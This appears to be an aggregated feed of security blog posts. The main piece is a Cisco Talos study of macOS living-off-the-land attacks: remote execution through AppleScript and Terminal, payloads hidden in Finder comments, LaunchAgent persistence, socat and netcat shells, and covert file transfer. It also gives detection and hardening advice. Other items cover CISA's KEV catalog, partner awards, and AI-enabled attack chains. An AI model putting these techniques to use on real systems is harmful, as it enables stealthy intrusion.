Tuesday, April 21, 2026

Bad Apples: Weaponizing native macOS primitives for movement and execution

  • As macOS adoption grows among developers and DevOps, it has become a high value target; however, native "living-off-the-land" (LOTL) techniques for the platform remain significantly under-documented compared to Windows. 
  • Adversaries can bypass security controls by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis. 
  • Attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP operating entirely outside the visibility of standard SSH-based telemetry. 
  • Defenders should shift from static file scanning to monitoring process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.

Bad Apples: Weaponizing native macOS primitives for movement and execution

As macOS adoption in the enterprise reaches record highs, with over 45 percent of organizations now utilizing the platform, the traditional "security through obscurity" narrative surrounding the OS has been rendered obsolete. Mac endpoints, once relegated to creative departments, are now the primary workstations for developers, DevOps engineers, and system administrators. Consequently, these machines have become high-value targets that serve as gateways to source code repositories, cloud infrastructure, and sensitive production credentials. 

Despite this shift, macOS-native lateral movement and execution tradecraft remain significantly understudied compared to their Windows counterparts. This research was conducted to address this critical knowledge gap. Through a systematic validation of native macOS protocols and system binaries, it is demonstrated how adversaries can “live off the land” (LOTL) by repurposing legitimate administrative tools. By weaponizing native primitives, such as Remote Application Scripting (RAS) and Spotlight metadata, intentional OS security features can be bypassed to transform standard system functions into robust mechanisms for arbitrary code execution and fleet-wide orchestration.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 1. macOS living-off-the-land (LOTL) attack flow.

The macOS enterprise blind spot 

macOS is no longer a niche operating system. According to the Stack Overflow 2024 Developer Survey, a third of professional developers use macOS as their primary platform. These machines represent high-value pivot points, often holding source code repositories, cloud credentials, and SSH keys to production infrastructure. 

Despite this trend, the MITRE ATT&CK framework documents far fewer techniques for macOS than for Windows, and recent industry reports indicate that macOS environments prevent significantly fewer attacks than their Windows or Linux counterparts. To address this disparity, community-driven resources such as LOOBins (living-off-the-orchard binaries) have emerged to catalog native macOS binaries that can be repurposed for malicious activity. This research aims to further close that gap by systematically enumerating the native pathways available for both movement and execution.

Remote command execution: Weaponizing native primitives 

Establishing a remote shell is the first step in any post-exploitation chain. While SSH is the standard, native macOS features provide several alternatives that can bypass traditional monitoring. 

Remote Application Scripting as a Software Deployment Tool (T1072) 

Remote Application Scripting (formerly known as Remote Apple Events or RAE) was introduced to extend the capabilities of the AppleScript Inter-Process Communication (IPC) framework across a network. By utilizing the Electronic Program-to-Program Communication (“eppc”) protocol, administrative tasks and application automation can be performed on remote macOS systems. This mechanism allows a controller machine to send high-level commands to a target machine, which are then processed by the “AppleEventsD” daemon. 

The Open Scripting Architecture (OSA) is utilized as the standardized framework for this inter-application communication and automation on macOS. Through the exchange of Apple Events, this architecture enables scripts to programmatically interact with the operating system and installed applications, providing the functional foundation for the “osascript” utility. 

Traditionally, RAE is viewed as a lateral movement vector; however, this research demonstrates that it can also be utilized as a standalone Software Deployment Tool for Execution (T1072)

Adversaries attempting to use RAE for complex payloads often encounter Apple’s intentional security features, specifically the -10016 Handler Error. This restriction prevents the “System Events” application from executing remote shell commands via do shell script, even when RAE is globally enabled.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 2. The -10016 Handler Error in remote application scripting.

To bypass this, a methodology was developed that treats “Terminal.app” as an execution proxy. Unlike “System Events”, “Terminal.app” is designed for shell interaction and accepts remote “do script” commands. To ensure payload integrity and bypass AppleScript parsing limitations (such as the -2741 syntax error), Base64 transport encoding is utilized. This transforms multi-line scripts into flat, alphanumeric strings that are decoded and executed in a two-stage process: 

  1. Deployment: A single RAE command instructs the remote “Terminal.app” to decode the Base64 string into a temporary path and apply chmod +x
  2. Invocation: A second RAE command explicitly invokes the script via "bash”, ensuring a proper shell context.
Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 3. Terminal.app as an execution proxy for Base64 payloads.

Remote Application Scripting for Lateral Movement (T1021.005) 

While RAE can be weaponized for execution, its primary function remains the facilitation of inter-process communication (IPC) across a network. In a lateral movement context, RAE is utilized to control remote applications by targeting the “eppc://” URI. This allows for the remote manipulation of the file system or the retrieval of sensitive environmental data without the need for a traditional interactive shell. 

For example, the command in Figure 4 can be used to remotely query the Finder for a list of mounted volumes on a target machine, providing an adversary with immediate insight into the victim's network shares and external storage:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 4. Remotely querying mounted volumes via RAE.

Because these actions are performed via Apple Events rather than standard shell commands, they often bypass security telemetry that focuses exclusively on process execution trees, making RAE a discreet and effective vector for lateral movement.

AppleScript execution via SSH 

AppleScript is macOS's built-in scripting language for automation. While RAE is a viable application control mechanism, Apple security controls prevent RAE from launching applications; they must already be running. Additionally, RAE must be enabled on the target. To circumvent these obstacles, osascript can be invoked directly over SSH. 
 
Passing osascript the system info command over SSH returns critical environmental details:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 5. Retrieving system information via osascript over SSH.

For arbitrary command execution, AppleScript's do shell script handler can be invoked over SSH. In the following example, do shell script is used to write a file to the target:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 6. Arbitrary file creation using do shell script over SSH. 

While SSH alone can accomplish shell tasks, osascript provides access to graphical user interfact (GUI) automation and Finder manipulation through Apple Events IPC rather than spawning shell processes. This creates a significant telemetry gap, as most endpoint detection tooling has less visibility into IPC-driven actions than standard shell process trees.

socat remote shell 

socat (SOcket CAT) is a command line utility for establishing bidirectional data streams between two endpoints. It supports a wide range of socket types including TCP, UDP, Unix domain sockets, and pseudo terminals (pty). 

In a lateral movement context, socat can establish an interactive shell on a target without relying on SSH. The target runs a listener that binds a login shell to a TCP port with pty allocation, and the attacker connects to it from a remote machine. 

On the target, the listener spawns an interactive bash session for each incoming connection with pty forwarding:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 7. Establishing a listener with PTY forwarding on the target. 

From the attacking machine, connecting to the listener provides a fully interactive terminal: 

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 8. Attacker connection to the socat listener.

On the target, the reuseaddr,fork options allow multiple connections and reuse of the port, while pty,stderr on the exec gives the connecting client a proper terminal with stderr output. On the sender side, raw,echo=0,icanon=0 puts the local terminal into raw mode so that control characters and signals pass through to the remote shell correctly. 

SSH is the de facto mechanism for gaining remote shell access on remote hosts, and as a result, it is where most detection engineering efforts are focused. socat achieves the same outcome, fully interactive terminal access, but operatesentirely outside the SSH ecosystem. There are no sshd logs, PAM authentication events, or “authorized_keys” to manage, which means detection pipelines built around SSH telemetry would not catch this activity.

Covert data transfer: Finder metadata abuse 

A notable constraint of RAE is its inability to write file contents directly. To work around this, we can abuse the Finder Comment (“kMDItemFinderComment”) field, which is stored as Spotlight metadata. 

Writing payloads to Finder Comments 

A notable constraint of RAE is its inability to write file contents directly. To circumvent this, threat actors can abuse the Finder Comment field (“kMDItemFinderComment”) — a component of Spotlight metadata stored as an extended attribute. By storing a payload within metadata rather than the file's data fork, they can bypass traditional file-based security scanners and static analysis tools, which typically focus on executable code and script contents. 

Because Finder is scriptable over RAE, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 9. Setting Finder comments via RAE for payload staging.

The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents. 

Extraction and execution 

On the target, extraction and execution is a single line. mdls reads the comment, base64 -D decodes it, and the result is piped to “bash”: 

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 10. Extraction and execution of metadata-stored payloads.

Persistence via LaunchAgent 

This approach can be paired with a LaunchAgent for persistence. A plist in “~/Library/LaunchAgents” that executes the extraction chain at user login allows the payload to run automatically. 

Our initial attempt using mdls inside the LaunchAgent failed because Spotlight may not be fully initialized when LaunchAgents fire. The fix was to replace mdls with osascript calling Finder directly to read the comment:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 11. Persistence via LaunchAgent and Finder metadata. 

Talos confirmed this successfully executes the payload at login. It is worth noting that macOS prompts the user to approve the bash execution at login, which is a visible indicator of background activity. The plist contains no payload, only a reference to metadata, so static analysis of the LaunchAgent would not reveal the malicious content. 

Lateral Tool Transfer techniques 

Once attackers achieve execution, they must move their toolkit across the environment. Several native protocols were validated for tool transfer (T1570). 

Standard protocols: SCP and SFTP 

SCP (Secure Copy Protocol) and SFTP (SSH File Transfer Protocol) are the most straightforward methods, operating over SSH and available out-of-the-box on any macOS system with Remote Login enabled.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 12. SCP file transfer syntax.
Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 13. SFTP file transfer syntax.

SMB-based transfer 

Server Message Block (SMB) is a network file sharing protocol commonly associated with Windows environments, but macOS includes native support for both SMB client and server functionality. In a lateral movement context, an attacker can mount a remote SMB share and access its contents as if they were local files. 

This method of setting up an SMB share on the victim requires SSH access. The following command creates a shared directory, loads the SMB daemon, and creates the share.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 14. Configuring a native SMB share on macOS.

With the share created, the next step is mounting it from the attacker machine. Attempting this action with the mount command failed due to an authentication error.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 15. Authentication error encountered during SMB mount.

To resolve this issue, GUI access to the victim machine was required. On the victim machine, navigate to System Settings > General > Sharing > File Sharing > Options. Located here is the option to store the user's account password on the computer. Even though this is labeled as "Windows File Sharing", it was required to properly authenticate the user when using the mount utility. 

However, this entire GUI dependency can be avoided by using osascript to mount the share instead of mount:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 16. Mounting SMB shares via osascript.

This mounts the share to “/Volumes/share” without requiring the GUI configuration step. With the share mounted, any file copied into the mount directory appears on the victim immediately. 

Netcat-based transfer 

nc (netcat) is a well-known general-purpose networking utility that ships with macOS. It can be utilized to open arbitrary TCP and UDP connections, listen on ports, and pass data between them. 

The simplest pattern involves piping commands directly into a netcat listener. On the target, a listener is established that pipes incoming data directly to sh:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 17. Netcat listener established on victim machine.

From the attacking machine, a command is then echoed into nc targeting the victim's IP and port:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 18. Command execution via Netcat (attacker side).
Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 19. Command execution via Netcat (victim side).

The attacker sends the curl google.com command over the wire, which is caught by the victim's listener and executed by sh. The resulting output confirms successful execution on the target. 

Netcat can also facilitate file transfers through several different methods. An attacker could invoke a fetch to a remote system where a script or payload is hosted, or start a simple HTTP server on their own machine to perform ad hoc tool transfer.

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 20. Serving files via netcat (Attacker Terminal 1).
Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 21. Initiating file transfer via Netcat (Attacker Terminal 2).

Git-based transfer 

git is a version control system ubiquitous in software development. Its prevalence on developer machines and reliance on SSH as a transport make git push a practical file transfer mechanism. The technique requires initializing a repository on the target and setting receive.denyCurrentBranch updateInstead. By default, git refuses pushes to a branch that is currently checked out on the remote. This setting overrides that behavior and updates the working tree on push, landing files on disk the moment the operation completes. 

First, a receiving repository is initialized on the target over SSH:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 22. Initializing a Git repository on the target.

On the attacker, a local repository is created with the payload, and the remote is pointed at the target:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 23. Pushing payloads to the target via Git. 

After the push, “script.sh” exists on the target at “~/repos/project/script.sh”. Additional file transfers only require adding new files, committing, and pushing again. Because git operates over SSH, the transfer is encrypted and uses the same authentication established for command execution. 

TFTP (Standard and unprivileged) 

TFTP (Trivial File Transfer Protocol) is a lightweight, unauthenticated file transfer protocol that operates over UDP. macOS includes both a TFTP server and client. The server is not active by default but can be started through launchd

With root access on the target, the system's built-in TFTP plist activates the server in a single command:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 24. Activating the native TFTP server.

This serves “/private/tftpboot” on the standard TFTP port (UDP 69). The TFTP system plist does not provide the -w flag to the tftpd process. Without it, the server only allows writes to files that already exist. A placeholder file must be created on the target for each file being transferred:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 25. Creating a placeholder file for TFTP transfer.

From the attacker, the payload is pushed to the target: 

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 26. Pushing payload to target via TFTP.

In a post-exploitation scenario without root access, tftpd can still be deployed by loading a user-created plist from “/tmp” on a non-standard port. This variant passes the tftpd -w flag, which allows write requests to create new files, removing the placeholder requirement. 

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 27. Non-root TFTP server deployment.

SNMP trap-based transfer 

SNMP (Simple Network Management Protocol) is used for monitoring and managing network devices. SNMP traps are unsolicited notifications sent from agents to a management station over UDP port 162. The trap payload can carry arbitrary string data under custom OIDs, which can be repurposed as a data transfer channel. macOS ships with the necessary net-snmp tools: snmptrap (“/usr/bin/snmptrap”) on the sender and snmptrapd (“/usr/sbin/snmptrapd”) on the receiver. 

The approach works by Base64 encoding a file, splitting it into fixed-size chunks, and sending each chunk as an SNMP trap payload under a custom OID in the private enterprise space (“1[.]3[.]6[.]1[.]4[.]1[.]99999”). A trap handler on the receiving end reassembles the chunks and decodes the file. The protocol uses three message types: “FILENAME” signals the start of a transfer, “DATA” carries a Base64 chunk, and “END” triggers reassembly. 

On the receiver, a trap handler processes incoming traps:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 28. SNMP trap handler logic.

The snmptrapd daemon is then configured on the target to route all incoming traps to the handler and started in the foreground:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 29. Configuring the snmptrapd daemon.

On the sender, a script handles the encoding, chunking, and transmission. Each chunk is sent as a separate SNMP trap with a short delay between sends to avoid overwhelming the receiver:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 30. Script for SNMP chunking and transmission. 

The sender initiates the transfer: 

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 31. Initiating data transfer via SNMP traps.

The target receives the transfer:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 32. Successful payload reassembly on target.

The matching MD5 hashes confirm the file was transferred and reassembled intact. 

Socat file transfer 

The socat shell established in the above "socat remote shell” section can also serve as a file transfer channel. Because the listener provides a fully interactive bash session, file contents can be written to the remote host by injecting a heredoc through the connection. This means socat alone handles both remote command execution and tool transfer without requiring any additional services or listeners. 

With the socat listener running on the target, the attacker delivers a file by piping a heredoc-wrapped cat command through a socat connection:

Bad Apples: Weaponizing native macOS primitives for movement and execution
Figure 33. File delivery via socat heredoc injection.

Detection and defensive considerations 

Defending against LOTL techniques requires a shift from simple network alerts to granular process and metadata analysis. 

Network indicators 

Inbound TCP traffic on port 3031 (the “eppc” port) and unusual SNMP/TFTP traffic on internal LAN segments should be monitored for potential unauthorized activity. 

Endpoint indicators (EVM) 

Through mapping to the Open Cybersecurity Schema Framework (OCSF), an open-source effort to deliver a simplified and vendor-agnostic taxonomy for security telemetry, high-fidelity signatures for these behaviors were identified: 

  • Suspicious lineage: Process trees following the pattern launchd -> AppleEventsD -> Terminal -> sh/bash
  • Metadata monitoring: Frequent or unusual calls to mdls or writes to “com.apple.metadata:kMDItemFinderComment”. 
  • Command line anomalies: base64 --decode commands originating from GUI applications or osascript executions containing “of machine "eppc://..."” arguments. 

Native security controls and hardening recommendations 

Several built-in macOS security mechanisms can be configured to mitigate the risks associated with native primitive abuse: 

  • Transparency, Consent, and Control (TCC) restrictions: The "Automation" category within TCC is designed to regulate inter-application communication. By enforcing strict TCC policies via Mobile Device Management (MDM), unauthorized Apple Events between applications — such as a script attempting to control “Terminal.app” or “Finder” — can be blocked. 
  • MDM Policy Enforcement: RAE and Remote Login (SSH) should be disabled by default across the fleet. These services can be managed and restricted using MDM configuration profiles (e.g., the “com.apple.RemoteAppleEvents”payload) to ensure they are only active on authorized administrative hosts. 
  • Service hardening: Unnecessary network-facing services, such as tftpd and snmpd, should be explicitly disabled. The removal of these launchd plists from “/System/Library/LaunchDaemons” (where permitted by System Integrity Protection) or the use of launchctl disable commands prevents their use as ad-hoc data transfer channels. 
  • Application firewall and Stealth Mode: The built-in macOS application firewall should be enabled and configured in "Stealth Mode." This configuration ensures the device does not respond to unsolicited ICMP or connection attempts on common ports, reducing the visibility of the endpoint during internal reconnaissance. 

Conclusion 

The research presented in this article underscores a fundamental reality of modern endpoint security. The same primitives designed for administrative convenience and system automation are often the most potent tools in an adversary's arsenal. By moving beyond traditional exploit-based attacks and instead LOTL, attackers can operate within the noise of legitimate system activity.

From the weaponization of the “eppc” protocol to the creative abuse of Spotlight metadata and SNMP traps, it is clear that the macOS attack surface is both vast and nuanced. These techniques demonstrate that even within a "walled garden" ecosystem, native pathways for movement and execution remain accessible to those who understand the underlying architecture. 

For defenders, the primary takeaway is that visibility remains the most effective deterrent. By shifting focus from static file analysis to the monitoring of process lineage, inter-process communication, and metadata anomalies, these "bad Apples" can be identified and neutralized. As macOS continues its expansion into the enterprise core, the documentation and detection of these native techniques must remain a priority for the security community. 



from Cisco Talos Blog https://ift.tt/aSlLHph
via IFTTT

CISA Adds 8 Exploited Flaws to KEV, Sets April-May 2026 Federal Deadlines

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including three flaws impacting Cisco Catalyst SD-WAN Manager, citing evidence of active exploitation.

The list of vulnerabilities is as follows -

  • CVE-2023-27351 (CVSS score: 8.2) - An improper authentication vulnerability in PaperCut NG/MF that could allow an attacker to bypass authentication on affected installations via the SecurityRequestFilter class.
  • CVE-2024-27199 (CVSS score: 7.3) - A relative path traversal vulnerability in JetBrains TeamCity that could allow an attacker to perform limited admin actions.
  • CVE-2025-2749 (CVSS score: 7.2) - A path traversal vulnerability in Kentico Xperience that could allow an authenticated user's Staging Sync Server to upload arbitrary data to path relative locations.
  • CVE-2025-32975 (CVSS score: 10.0) - An improper authentication vulnerability in Quest KACE Systems Management Appliance (SMA) that could allow an attacker to impersonate legitimate users without valid credentials. 
  • CVE-2025-48700 (CVSS score: 6.1) - A cross-site scripting vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow an attacker to execute arbitrary JavaScript within the user's session, resulting in unauthorized access to sensitive information.
  • CVE-2026-20122 (CVSS score: 5.4) - An incorrect use of privileged APIs vulnerability in Cisco Catalyst SD-WAN Manager that could allow an attacker to upload and overwrite arbitrary files on the affected system and gain vmanage user privileges.
  • CVE-2026-20128 (CVSS score: 7.5) - A storing passwords in a recoverable format vulnerability in Cisco Catalyst SD-WAN Manager that could allow an authenticated, local attacker to gain DCA user privileges by accessing a credential file for the DCA user on the filesystem as a low-privileged user.
  • CVE-2026-20133 (CVSS score: 6.5) - An exposure of sensitive information to an unauthorized actor vulnerability in Cisco Catalyst SD-WAN Manager that could allow remote attackers to view sensitive information on affected systems.

It's worth noting that CISA added CVE-2024-27198, another flaw impacting on-premise versions of JetBrains TeamCity, to the KEV catalog in March 2024. It's not known at this stage if both vulnerabilities are being exploited together and if the activity is the work of the same threat actor.

The exploitation of CVE-2023-27351, on the other hand, was attributed to Lace Tempest in April 2023 in connection with attacks delivering Cl0p and LockBit ransomware families.

As for CVE-2025-32975, Arctic Wolf said it observed unknown threat actors weaponizing the bug to target unpatched SMA systems as late last month, although the exact end goals of the campaign remain unknown.

Cisco, for its part, also said it became aware of the exploitation of CVE-2026-20122 and CVE-2026-20128 in March 2026. The company has yet to revise its advisory to reflect the in-the-wild abuse of CVE-2026-20133.

In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies have been recommended to address the three Cisco vulnerabilities by April 23, 2026, and the rest by May 4, 2026.



from The Hacker News https://ift.tt/Xq3FrMD
via IFTTT

Monday, April 20, 2026

Celebrating the Partners powering Citrix forward

At Citrix UNITE, we had the opportunity to recognize what sits at the very heart of our business: our partners.

The Citrix Partner of the Year Awards celebrate organizations across our ecosystem who go above and beyond to help customers modernize work, strengthen security, and deliver exceptional digital experiences. From global systems integrators to regional specialists and partners, this year’s winners reflect the incredible breadth, depth, and diversity of the Citrix partner community.

What stood out most at UNITE wasn’t just the innovation on display—it was the sheer range of partners supporting Citrix customers around the world. Different geographies. Different business models. Different strengths. One shared commitment to customer success.

As Hector Lima, Co‑President Citrix, shared:

“Partners are fundamental to how Citrix shows up for customers every day. What makes this community so powerful is the diversity of organizations supporting our work—from global leaders to regional experts, each bringing unique strengths to the table. We’re incredibly proud to recognize this year’s award winners and the impact they’re making with our customers.”

The Partner of the Year Awards are more than a moment of recognition; they’re a reflection of how we work. Citrix is built to partner, and our strategy is shaped by collaboration, trust, and shared outcomes.

To all of this year’s winners: thank you for your leadership, your innovation, and your continued investment in the Citrix partnership. We’re proud to celebrate you and even more excited about what we’ll build together next.

Citrix Partner of the Year award winners for FY25

  • Customer Growth Partner of the Year
    • North America: BlueAlly Technology Solutions
    • Europe: SoftwareOne
  • Technical Service Partner of the Year
    • North America: e360
    • Europe: Atea
  • Evangelist Partner of the Year
    • North America: Altanora Systems Inc.
    • Europe: Danoffice IT Solutions & Services
  • Arrow Partner of the Year
    • North America: Envision
    • Europe: SoftwareOne
  • Global Systems Integrator Awards
    • GSI Partner of the Year: HCLTech
    • GSI Innovation Award: Wipro
  • International & Represented Markets Awards
    • Strategic Partner of the Year: CXA (ASEAN Markets)
    • Individual Excellence Awards
  • Strategic Partner Sales Executive of the Year: Nalia Silva – New Cloud Technologies (Latin America)
  • Strategic Partner Technology Specialist of the Year: Yair Biton – Innocom / Aman Group (Middle East & Central Asia)


from Citrix Blogs https://ift.tt/1jAa5UM
via IFTTT

Why Most AI Deployments Stall After the Demo

The fastest way to fall in love with an AI tool is to watch the demo.

Everything moves quickly. Prompts land cleanly. The system produces impressive outputs in seconds. It feels like the beginning of a new era for your team.

But most AI initiatives don't fail because of bad technology. They stall because what worked in the demo doesn't survive contact with real operations. The gap between a controlled demonstration and day-to-day reality is where teams run into trouble.

Most AI product demos are built to highlight potential, not friction. They use clean data, predictable inputs, carefully crafted prompts, and well-understood use cases. Production environments don't look like that. In real operations, data is messy, inputs are inconsistent, systems are fragmented, and context is incomplete. Latency matters. Edge cases quickly outnumber ideal ones. This is why teams often see an initial burst of enthusiasm followed by a slowdown once they try to deploy AI more broadly.

What actually breaks in production

Once AI moves from demo to deployment, a few specific challenges tend to emerge.

Data quality becomes a real issue. In security and IT environments, data is often spread across multiple tools with different formats and varying levels of reliability. A model that performs well on clean demo data can struggle when fed noisy or incomplete inputs.

Latency becomes visible. A model that feels fast in isolation can introduce meaningful delays when embedded in multi-step workflows running at scale.

Edge cases start to matter. Production workflows include exceptions, unusual scenarios, and unpredictable user behavior. Systems that handle common cases well can break down quickly when confronted with real-world complexity.

Integration becomes a limiting factor. Most operational work requires coordinating across multiple systems. If an AI tool can't connect deeply into those workflows, its impact stays limited regardless of how capable the underlying model is.

Governance is where enthusiasm runs out

Beyond technical challenges, governance has become one of the biggest reasons AI initiatives stall. With general-purpose AI tools now widely accessible, organizations are grappling with serious questions around data privacy, appropriate use cases, approval processes, and compliance requirements.

Many teams discover that while AI experimentation is easy, operationalizing AI safely requires clear policies and controls. Without them, even promising initiatives get stuck in review cycles or fail to scale. 

When done properly, governance transcends its goal of preventing misuse. It becomes a framework that lets teams move quickly and confidently, with appropriate oversight built in from the start.

What determines whether AI actually delivers

Teams that successfully move beyond the demo tend to share a few habits. They test AI against real workflows rather than idealized scenarios, using real data, real processes, and real constraints. They evaluate performance under realistic conditions, measuring accuracy under load, monitoring latency, and understanding how the system behaves when inputs vary. They prioritize integration depth, because AI operating in isolation rarely has much impact. And they pay close attention to the cost model, since AI usage can scale quickly and without visibility into consumption, costs can become a blocker.

Perhaps most importantly, they invest in governance early. Clear policies, guardrails, and oversight mechanisms help teams avoid delays and build confidence in their deployments.

A practical checklist before you commit

If you're evaluating AI tools, a few steps can help surface limitations before they become blockers: run proofs of concept on high-impact, real-world workflows; use realistic data during testing; measure performance across accuracy, latency, and reliability; assess integration depth with your existing stack; and clarify governance requirements upfront.

These aren't complicated steps, but they make a significant difference in whether a promising demo leads to meaningful production deployment.

Access the IT and security field guide to AI adoption.

The bottom line

AI has real potential to change how security and IT teams work. But success depends less on the sophistication of the model and more on how well it fits into real workflows, integrates with existing systems, and operates within a clear governance framework. Teams that recognize this early are far more likely to move from experimentation to lasting impact.

Looking for a structured approach to evaluating AI tools in practice? The IT and security field guide to AI adoption walks through selection criteria, evaluation questions, and a step-by-step process for finding solutions that hold up beyond the demo.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/MfhFL71
via IFTTT

Fracturing Software Security With Frontier AI Models

Introduction

Unit 42 recently got hands-on with frontier AI models, and our initial findings indicate a major shift in the speed, scale and capability of AI models to identify software vulnerabilities. We are now seeing the first frontier models to demonstrate the autonomous reasoning required to function not merely as a coding assistant, but as a full-spectrum security researcher. This brings worrisome advancements in:

  • Autonomous zero-day discovery
  • Collapsing the patching window for N-days
  • Advanced chaining of complex exploitation paths
  • Real-time adaptation to bypass controls of hardened environments

The impact of frontier AI models on the threat landscape goes way beyond vulnerability discovery and exploitation. As these models become widely available in the near future, we are likely to see dramatic increases in the speed and scale of AI-enabled attacks across the entire attack lifecycle.

Frontier Models Exposing the Fragility of Our Software Ecosystem

As discussed at length by our colleagues at Anthropic, frontier AI models are a significant advancement in the capabilities of AI models. These models can, with minimal human expertise, identify vulnerabilities in systems and software. They can also analyze attack paths, including identifying complex exploit chains.

Our initial threat assessment is that frontier AI models will significantly increase the risk of zero-day and N-day vulnerabilities in software. They lower the barrier to entry for unskilled attackers to find complex exploit chains, while also dramatically accelerating the vulnerability discovery-to-exploitation cycle.

Open Source Software and Supply Chain Risks

Open source software (OSS) in particular may face significant risks from frontier AI models, at least in the short term. It has traditionally been considered that “given enough eyeballs, all bugs are shallow.” However, the transparency of exposing source code resulted in some striking observations in our tests of frontier AI models.

When we run them against source code, frontier AI models demonstrate a strong ability to identify vulnerabilities and complex exploit chains. When we test the models against compiled code (the executable version of code), however, we see only marginal advancements compared to publicly available AI models. Consequently, open-source software faces a greater immediate risk.

It is crucial to remember that nearly all commercial software incorporates open-source components within its compiled code.

To be clear, Unit 42 does not believe that OSS is inherently more vulnerable than commercially available software. We assess OSS has a heightened risk of being compromised due to the open nature of the software development ecosystem. This includes the availability of public source code for threat actors to rigorously test for vulnerabilities beyond the visibility of defenders, and the limited number of maintainers (and their time) for many OSS projects.

Unit 42 predicts an increase in large-scale supply chain compromises of OSS projects, similar to the recent TeamPCP supply chain attacks and North Korea’s attack on the Axios JavaScript library.

A New Frontier in AI-Enabled Attack Paths

Despite the hype cycle, we are still only beginning to see the impact of AI-enabled threats on the threat landscape. Yes, we have seen incredible gains in the speed and scale of attacks leveraging AI in multiple cases and through security researcher testing. To date, these incidents still represent a very small percentage of the overall threat activity Unit 42 tracks.

That said, threat actors continue to invest in AI research and testing capabilities. As we noted in our threat research into a few AI-related malware samples, we see threat actors testing AI for:

  • Writing malware
  • Remote decision making (e.g. augmenting or replacing a C2 operator)
  • Local decision making (e.g. locally executed agentic attack flows)

With only a few notable exceptions, such as Anthropic’s reporting on GTG-1002 AI-enabled attacks against approximately 30 organizations and Amazon’s reporting on threat actors targeting edge devices at scale, the world has yet to see massive adoption of AI in large-scale campaigns.

With the advancements and public release of frontier AI models, Unit 42 believes the threat landscape is likely to see the rapid increase in speed, scale and sophistication of cyberattacks that we have warned about. Most critically, we don’t need to teach frontier AI models how to hack. They already know how to do it and can do it autonomously.

We will illustrate a few areas where we believe we will see advanced usage of AI using a common attack path. In this case, we will apply the thought experiment to spear phishing leading to data exfiltration for extortion:

  • Reconnaissance: An attacker leverages frontier models to rapidly scrape the internet for targeting intelligence. This includes:
    • Identifying key leaders and their contact information via press releases, LinkedIn and corporate websites
    • Identifying software used in the environment via job postings, press releases for partnering agreements
    • Finding other available information to inform the large language model (LLM) to write well crafted spear-phishing emails, texts or audio scripts for social engineering attacks
  • Initial access: A human reviews the reconnaissance data and the draft phishing emails and sends them to targets with malware attached. An AI agent on the command-and-control (C2) server waits for the malware to check in after initial delivery.
  • Lateral movement and discovery: A Model Context Protocol (MCP) server autonomously instructs the installed malware to:
    • Scan inside the network
    • Map what it can see
    • Identify running software versions
    • Gather exposed credentials on endpoints and in databases
    • Move laterally across devices collecting sensitive data as it goes

The agent automatically tests each set of credentials as they are discovered, enumerates their privileges and tracks success/failure statistics automatically.

  • Exploitation: Throughout lateral movement and discovery, an AI agent collects data and sends it back to the MCP C2 server. The agent analyzes the running services and applications, identifies vulnerabilities, writes custom exploit code and passes the exploit back to the onsite malware. The malware executes autonomously to continue its progress with privilege escalation, defense evasion and lateral movement across network segments.
  • Exfiltration and documentation: The collected data is returned to an MCP server and dropped into a datastore. It is then analyzed by an LLM to automatically provide a summary of key findings to the human operator. These findings include an assessment of the value of the stolen dataset based on the operator’s intended use of the data.

Figure 1 illustrates the complete attack path.

A diagram illustrates an AI-enabled attack path, orchestrated by an MCP C2 Server. It details four stages: AI reconnaissance and initial access, autonomous lateral movement and discovery, AI-driven exploitation with custom exploits, and LLM-summarized data exfiltration. A central cloud icon represents the MCP C2 server.
Figure 1. AI-enabled attack path.

It should be clear that we do not currently expect to see entirely new attack techniques created by AI. Rather, we see AI enabling attacks to move faster, autonomously and against multiple targets simultaneously.

It is the speed and scale of AI-enabled attacks that we need to prepare for as defenders, not completely unknown techniques.

